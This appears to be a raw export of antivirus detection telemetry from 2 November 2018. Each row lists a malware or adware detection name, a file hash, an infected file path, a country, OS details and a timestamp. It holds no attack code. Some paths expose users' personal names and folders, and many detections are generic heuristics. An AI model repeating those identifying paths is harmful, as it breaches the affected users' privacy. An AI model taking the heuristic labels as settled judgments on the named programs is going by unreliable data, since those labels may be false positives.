  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T21:57:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T21:57:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:59:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2debaae4c73958199395966de44cd51866ac16c04d51f57fabdf1faa81b1e314', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2DEBAAE4C73958199395966DE44CD51866AC16C04D51F57FABDF1FAA81B1E314', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2debaae4c73958199395966de44cd51866ac16c04d51f57fabdf1faa81b1e314', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:50:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2debaae4c73958199395966de44cd51866ac16c04d51f57fabdf1faa81b1e314', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2DEBAAE4C73958199395966DE44CD51866AC16C04D51F57FABDF1FAA81B1E314', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2debaae4c73958199395966de44cd51866ac16c04d51f57fabdf1faa81b1e314', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:34:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2debaae4c73958199395966de44cd51866ac16c04d51f57fabdf1faa81b1e314', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2DEBAAE4C73958199395966DE44CD51866AC16C04D51F57FABDF1FAA81B1E314', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2debaae4c73958199395966de44cd51866ac16c04d51f57fabdf1faa81b1e314', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:03:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dyne repair utility.exe', filepath='D:\\Dyne1\\DYNECC\\Dyne Repair Utility.exe', filesize=96000, name='TR/Patched.Ren.Gen.#M300.#R3807'), hash='2e26e33a68c31f79c353990911a4d18e9d1626ec0d135aeb1746636bcddad6e4', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='OM', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T04:55:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unins000.exe', filepath='C:\\Program Files\\Aurora3D\\Maker3D\\unins000.exe', filesize=22528000, name='W32/Sality.AT.#M1.#R1'), hash='2eb0e7c909557cd71d15f7f2bbc41058a26d7660b62fc318cbe36b84a761c11c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:29:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unins000.exe', filepath='C:\\Program Files\\Aurora3D\\Maker3D\\unins000.exe', filesize=22528000, name='W32/Sality.AT.#M1.#R1'), hash='2eb0e7c909557cd71d15f7f2bbc41058a26d7660b62fc318cbe36b84a761c11c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:29:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pinball.exe', filepath='C:\\Program Files\\Windows NT\\Pinball\\pinball.exe', filesize=320000, name='W32/Alman.BB.#M1.#R1'), hash='2ebba022d9540b4b9953c96a4eebb05686478b341cf72752c4520a1d0f996e52', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:52:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=2880000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='2eeb05ccca14d88828e10e9742c0e03fb984535dae47a9c357a6e5edbee4642f', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T00:03:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zuma.exe', filepath='\\\\?\\E:\\العاب\\زوما\\ZUMA_DELUXE_V1.0_RUZO\\Zuma.exe', filesize=3328000, name='W32/Ramnit.C.#M1.#R1'), hash='2f142dd3ee42685279972e39f16f0ee1676f51a2bbd969efff0af3163ce7cdbb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T17:26:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T09:14:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T03:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T17:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T23:14:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T11:14:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T01:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T21:14:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T13:14:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T15:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T19:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='convertpdf.exe', filepath='D:\\New folder\\Program Files\\Adobe\\Acrobat 8.0\\Designer 8.0\\ConvertPDF.exe', filesize=616000, name='W32/Sality.AT.#M1.#R1'), hash='2f802a9ae598af9d87138d3c46c332e9b73cf6fa633e70d39b4d689810a2278a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-02T03:52:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='foxitreader530.0423 enu setup.exe', filepath='G:\\Soft All\\Reza New Soft Uisc\\Softwer\\FoxitReader530.0423 enu Setup.exe', filesize=16940000, name='W32/Sality.AT.#M1.#R1'), hash='3009149ae8492ce24430b68dccf6cce4ebccca48d2ab26927da0ce4c378c10d2', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T10:28:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='30b74a05d543886bcf20296ccd1c030d2e825381d1249c594e291df91188c233', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\30B74A05D543886BCF20296CCD1C030D2E825381D1249C594E291DF91188C233', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='30b74a05d543886bcf20296ccd1c030d2e825381d1249c594e291df91188c233', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:32:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='30b74a05d543886bcf20296ccd1c030d2e825381d1249c594e291df91188c233', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\30B74A05D543886BCF20296CCD1C030D2E825381D1249C594E291DF91188C233', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='30b74a05d543886bcf20296ccd1c030d2e825381d1249c594e291df91188c233', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:52:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup activation.exe', filepath='C:\\Program Files (x86)\\Removewat 2.2.7\\Setup activation.exe', filesize=832000, name='HEUR/AGEN.1004038.#M1.#R1'), hash='30d54dbf8fb4ca056b55e739742ff8eb6b2221c321c18f7ef600c63641bb3439', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=45056, timestamp='2018-11-02T06:07:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-030556-e15c6155', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-030556-E15C6155', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='30e1137f37f4c90814e8b85325d0453b172e8df5e31c256975fe6225a448a358', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:07:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='30e1137f37f4c90814e8b85325d0453b172e8df5e31c256975fe6225a448a358', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\30E1137F37F4C90814E8B85325D0453B172E8DF5E31C256975FE6225A448A358', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='30e1137f37f4c90814e8b85325d0453b172e8df5e31c256975fe6225a448a358', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:42:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='30e1137f37f4c90814e8b85325d0453b172e8df5e31c256975fe6225a448a358', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\30E1137F37F4C90814E8B85325D0453B172E8DF5E31C256975FE6225A448A358', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='30e1137f37f4c90814e8b85325d0453b172e8df5e31c256975fe6225a448a358', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:03:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zcnybkxe.htm', filepath='D:\\new backup\\alllllllllllll\\Users\\Baybayan\\AppData\\Local\\Temp\\Low\\ZCNYBKXE.htm', filesize=264000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='310136c1b3d38eec6b3da81ef6576039c576741be8c3836d56cb9b642ecee484', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:05:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-171310-f6abe1d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a5962524\\AVSCAN-20181102-170133-9D62EB10\\AVSCAN-20181102-171310-F6ABE1D9', filesize=2048000, name='ADWARE/MultiPlug.Gen4.#M1.#R1'), hash='3110b1afdedbad8be144744661e48e5fe1484ec72879936c34e962adc29a6aba', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:13:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0147459.exe', filepath='N:\\System Volume Information\\_restore{5ADD86DC-9807-43A0-B9F3-6D715E388D69}\\RP29\\A0147459.exe', filesize=1664000, name='TR/Patched.Gen.#M300.#R2947'), hash='318400d8599db859dee1df539205e07a2f208e3457e98fe7beaadc63c0f74836', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:46:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='31843f8c126110a469d72b6d1d5c60193a4888c8f86831aa240b0be790ae6749', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-8\\31843F8C126110A469D72B6D1D5C60193A4888C8F86831AA240B0BE790AE6749', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='31843f8c126110a469d72b6d1d5c60193a4888c8f86831aa240b0be790ae6749', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:25:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sdpefilter.exe', filepath='C:\\Program Files\\Hewlett-Packard\\Drive Encryption\\SDPEFilter.exe', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='3196de18e53fc7c8061f5d669d5ec9315697ebdd4811588c3a140360756c11a3', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:JdLxRGqxc0uHZfaY.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T00:48:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083330-50af9d29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e3ca1d49\\AVSCAN-20181102-083309-4D010CC2\\AVSCAN-20181102-083330-50AF9D29', filesize=768000, name='X2000M/Agent.3997.#M1.#R1'), hash='31ce23a877a9932f7b3c03b458fa8bc8fe52f7e00599ddd704e64f3027e4e9ee', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:33:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='professional egr remover.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Professional EGR Remover\\Professional EGR Remover.EXE', filesize=8000000, name='TR/Crypt.ZPACK.Gen.#M300.#R8169'), hash='325fcfaae8403873bd8772fa2c68a7e1a4b9ba82601c29b9be4663862cbc8e6d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:58:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='professional egr remover.exe', filepath='C:\\Program Files\\Professional EGR Remover\\Professional EGR Remover.exe', filesize=8000000, name='TR/Crypt.ZPACK.Gen.#M300.#R8169'), hash='325fcfaae8403873bd8772fa2c68a7e1a4b9ba82601c29b9be4663862cbc8e6d', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:47:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='professional egr remover.exe', filepath='C:\\Program Files\\Professional EGR Remover\\Professional EGR Remover.exe', filesize=8000000, name='TR/Crypt.ZPACK.Gen.#M300.#R8169'), hash='325fcfaae8403873bd8772fa2c68a7e1a4b9ba82601c29b9be4663862cbc8e6d', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:13:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-032340-6e33d2ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-032340-6E33D2AE', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='328fbbeb694428d090ff636b4a94c2528138cd1cc8f3c6766684699d8552e6ae', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:25:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='32ac5b4c0cbec7debc03e163bc0cf52f948f65fbfaea82c323aae971b83f56c8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\32AC5B4C0CBEC7DEBC03E163BC0CF52F948F65FBFAEA82C323AAE971B83F56C8', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='32ac5b4c0cbec7debc03e163bc0cf52f948f65fbfaea82c323aae971b83f56c8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:23:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\Intel\\Intel(R) Processor Graphics\\uninstall\\Setup.exe', filesize=1096000, name='W32/Jeefo.A.#M1.#R1'), hash='32b40409c157056050fd928b0ff73ffe9b91fc84f5c765b028d88b1a864b4b89', metadata=Row(cmdline='\\\\\\/Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\dllhost.exe', parentsize=7168, timestamp='2018-11-02T07:35:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\Intel\\Intel(R) Processor Graphics\\uninstall\\Setup.exe', filesize=1096000, name='W32/Jeefo.A.#M1.#R1'), hash='32b40409c157056050fd928b0ff73ffe9b91fc84f5c765b028d88b1a864b4b89', metadata=Row(cmdline='\\\\\\/Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\dllhost.exe', parentsize=7168, timestamp='2018-11-02T07:17:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\Intel\\Intel(R) Processor Graphics\\uninstall\\Setup.exe', filesize=1096000, name='W32/Jeefo.A.#M1.#R1'), hash='32b40409c157056050fd928b0ff73ffe9b91fc84f5c765b028d88b1a864b4b89', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T06:55:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\Intel\\Intel(R) Processor Graphics\\uninstall\\Setup.exe', filesize=1096000, name='W32/Jeefo.A.#M1.#R1'), hash='32b40409c157056050fd928b0ff73ffe9b91fc84f5c765b028d88b1a864b4b89', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T06:55:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\Intel\\Intel(R) Processor Graphics\\uninstall\\Setup.exe', filesize=1096000, name='W32/Jeefo.A.#M1.#R1'), hash='32b40409c157056050fd928b0ff73ffe9b91fc84f5c765b028d88b1a864b4b89', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T06:55:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\Intel\\Intel(R) Processor Graphics\\uninstall\\Setup.exe', filesize=1096000, name='W32/Jeefo.A.#M1.#R1'), hash='32b40409c157056050fd928b0ff73ffe9b91fc84f5c765b028d88b1a864b4b89', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T06:55:49Z'), dt=datetime.date(2018, 11, 2)),
